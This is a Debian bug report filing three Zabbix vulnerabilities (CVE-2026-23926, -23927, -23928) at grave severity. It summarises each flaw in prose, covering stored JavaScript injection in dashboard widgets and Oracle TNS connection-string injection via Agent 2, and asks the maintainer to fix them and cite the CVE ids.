Source: zabbix Version: 1:7.0.22+dfsg-1.1 Severity: grave Tags: security upstream X-Debbugs-Cc: [email protected], Debian Security Team <[email protected]>
Hi, The following vulnerabilities were published for zabbix. Choosed RC level severity as this should be fixed for forky. CVE-2026-23926[0]: | An authenticated (non-super) administrator can create a maintenance | period with a JavaScript payload that is executed by any user that | opens tooltip for that maintenance period in the Host navigator | widget. This can allow the attacker to perform unauthorized actions | depending on which user opens the tooltip. CVE-2026-23927[1]: | A user able to connect to Agent 2 can inject an Oracle TNS | connection string via the 'service' parameter. This can lead to | Agent 2 connecting to an attacker-controlled server and leaking | Oracle database credentials if they are saved in a named session. CVE-2026-23928[2]: | The Item history widget (in Zabbix 7.0+) or the Plain text widget | (in Zabbix 6.0) can execute injected JavaScript when HTML display is | enabled. This can allow an attacker to perform unauthorized actions | depending on which user opens a dashboard containing these widgets. | The malicious JavaScript would have to come from a monitored host | controlled by the attacker. Note: the Item history widget is a | replacement for the Plain text widget since Zabbix 7.0. If you fix the vulnerabilities please also make sure to include the CVE (Common Vulnerabilities & Exposures) ids in your changelog entry. For further information see: [0] https://security-tracker.debian.org/tracker/CVE-2026-23926 https://www.cve.org/CVERecord?id=CVE-2026-23926 [1] https://security-tracker.debian.org/tracker/CVE-2026-23927 https://www.cve.org/CVERecord?id=CVE-2026-23927 [2] https://security-tracker.debian.org/tracker/CVE-2026-23928 https://www.cve.org/CVERecord?id=CVE-2026-23928 Please adjust the affected versions in the BTS as needed. Regards, Salvatore
